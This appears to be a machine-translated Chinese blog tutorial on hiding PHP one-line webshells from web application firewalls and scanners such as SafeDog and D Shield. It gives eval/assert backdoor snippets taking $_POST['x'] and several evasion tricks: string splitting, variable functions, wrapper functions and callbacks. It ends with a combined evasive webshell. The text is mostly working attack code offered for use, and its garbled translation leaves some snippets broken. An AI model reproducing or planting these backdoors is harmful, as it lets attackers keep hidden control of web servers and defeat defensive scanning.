PHP A word over the dog, Guardian, D Shield, such as free from the idea of killing!

Original reproduced in: http://www.legendsec.org/1701.html

I think the writing is quite popular.

00x1. Keyword splitting.
such as Assert, can be written as ' a '. SS '. ' E '. ' R '. ' T ' so.
Summary: Although this method is simple, but it does not have too strong to avoid killing effect, need to combine other methods.

00x2. mutable variables, references, mutable functions.

Variable variables such as $a=$_post[' X ']; $b = ' a '; @eval ($ $b);
Test results:
Summary: This approach to the dog and other WAF can be bypassed Oh ~ but for D shield this multi-rule is invalid!

References such as $a=$_post[' X ']; $b =& $a; @eval ($b);
Test results:

Summary: This approach is similar to the previous method.

Variable functions such as $a= ' a '. ' SS '. ' E '. ' R '. ' T '; $a ($_post[' x ');
Test results:
Summary: This method for dogs, 3 guards, D shield and so on are no effect oh ~

00x3. Add additional code.

Add additional code such as if (empty ($a))

                                        {
                                              $a =$_post[' x '];
                                        }

@eval ($a);
Test results:
Summary: This method is more suitable for the big brain hole small partners ~

00x4. function substitution.

Use other functions, such as Eval, to replace with an assert.


Summary: This method is suitable for use when the Eval function is disabled oh ~

00x5. Encapsulation into the new function.

A new function is defined so that it is encapsulated in a new function.

function test ($a) {//define an operation named Test and use $ A to accept the argument

eval ($a);

}

Test ($_post[' x ']);

Test results:
Summary: This method is suitable for PHP-based people Oh, posture coquettish ~ not afraid of!

00x6. Function callback.

Calls are made using other functions and executed.

such as: Array_map (' a '. ') S '. ' Se '. ' R '. ' T ', Array ($_post[' x '));
Test Results:
Summary: This method is suitable for people with PHP Foundation Oh ~ This method is definitely over the WAF Oh ~


00x7. Use the features of various methods to write a word about a WAF.
<?php
function test ($a) {//Take advantage of the learned encapsulation function
if (empty ($a)) {//Take advantage of the learning to add additional code
$a = "echo ' qq:xxxxxxx ';"; Use this code to disrupt D-Shield's judgment.
}
@eval ($a);
}
@test ($_post[' x ']);
?>


Test Results:

The END

PHP A word over the dog, Guardian, D Shield, such as free from the idea of killing!